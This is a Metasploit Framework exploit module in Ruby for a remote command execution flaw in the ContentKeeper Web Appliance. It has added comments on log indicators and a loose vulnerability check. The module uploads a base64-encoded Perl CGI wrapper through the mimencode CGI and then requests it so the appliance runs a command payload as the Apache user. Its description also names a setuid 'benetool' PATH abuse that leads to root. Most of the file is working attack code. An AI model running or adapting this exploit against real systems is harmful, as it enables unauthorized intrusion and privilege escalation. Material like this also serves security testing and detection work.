
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Exploit module for the ContentKeeper Web Appliance's /cgi-bin/ck/mimencode
  # CGI (affected versions and references are given in the module metadata
  # below). One run issues two plain-HTTP requests to RPORT over raw TCP:
  # a POST to /cgi-bin/ck/mimencode carrying a base64 body, followed by a GET
  # for /cgi-bin/ck/bak.txt. That request pair in a web-server access log is
  # the simplest indicator for anyone reviewing logs for this activity.
  include Exploit::Remote::Tcp

  # Module metadata. The only datastore option registered here is RPORT
  # (default 80); RHOST is provided by the Tcp mixin and is read by #exploit
  # to build the Host header.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ContentKeeper Web Remote Command Execution',
      'Description' => %q{
This module exploits the ContentKeeper Web Appliance. Versions prior
to 125.10 are affected. This module exploits a combination of weaknesses
to enable remote command execution as the Apache user. Following exploitation
it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
to escalate to root.
      },
      'Author' => [ 'patrick' ],
      'Arch' => [ ARCH_CMD ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' =>
      [
        [ 'OSVDB', '54551'],
        [ 'OSVDB', '54552'],
        [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
      ],
      'Privileged' => false,
      'Payload' =>
      {
        'DisableNops' => true,
        'Space' => 1024,
      },
      'Platform' => ['unix'],
      'Targets' =>
      [
        [ 'Automatic', { } ]
      ],
      'DisclosureDate' => 'Feb 25 2009',
      'DefaultTarget' => 0))
    register_options(
      [
        Opt::RPORT(80),
      ],self.class)
  end

  # Vulnerability check: sends a bare GET for the mimencode CGI and reads the
  # reply. A "500 Internal" status line is taken as evidence that the CGI is
  # present and reachable; anything else (including an empty reply) yields
  # Safe. This is a heuristic — any 500 from that path matches, so a patched
  # or merely misconfigured CGI could still be reported as Vulnerable, and a
  # vulnerable host that answers differently would be reported as Safe.
  def check
    connect
    sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
    # NOTE(review): the two arguments are Rex::IO::Stream#get's timeout and
    # delta — confirm that -1 is intended to mean "no overall timeout" here.
    banner = sock.get(-1,3)
    disconnect
    if (banner =~ /500 Internal/)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  # Two-stage delivery over raw TCP (no HTTP client mixin, so no keep-alive
  # and no parsing of either response):
  #   1. POST a base64-encoded Perl CGI script to the mimencode CGI. The
  #      query string (-u+-o+bak.txt) presumably reaches mimencode as its
  #      command-line arguments, so the decoded script ends up as bak.txt in
  #      the cgi-bin directory — inferred from the URL, not shown in this file.
  #   2. After a fixed 5 s pause, GET /cgi-bin/ck/bak.txt so the web server
  #      runs that script, which hands the encoded payload to Perl's system().
  def exploit
    # Perl CGI wrapper: emit a Content-type header, then run the payload.
    # Double quotes inside the payload are backslash-escaped so they survive
    # inside the Perl double-quoted string literal.
    exp = "#!/usr/bin/perl\n"
    exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
    exp << "system(\""
    exp << payload.encoded.gsub('"', '\"')
    exp << "\");\n"
    body = Rex::Text.encode_base64(exp)
    connect
    sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"
    sploit << "Host: #{datastore['RHOST']}\r\n"
    # body is base64 ASCII, so String#length equals its byte count. The extra
    # "\r\n\r\n" appended in the put below is not counted in Content-Length.
    sploit << "Content-Length: #{body.length}\r\n\r\n"
    print_status("Uploading payload to target.")
    sock.put(sploit + body + "\r\n\r\n")
    disconnect
    # Fixed delay before the trigger request; presumably gives the CGI time to
    # finish writing bak.txt. The upload response is never read or checked.
    sleep(5)
    print_status("Calling payload...")
    connect
    req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
    req << "Host: #{datastore['RHOST']}\r\n"
    sock.put(req + "\r\n\r\n")
    # Start the payload handler before tearing down the trigger connection.
    handler
    disconnect
  end
end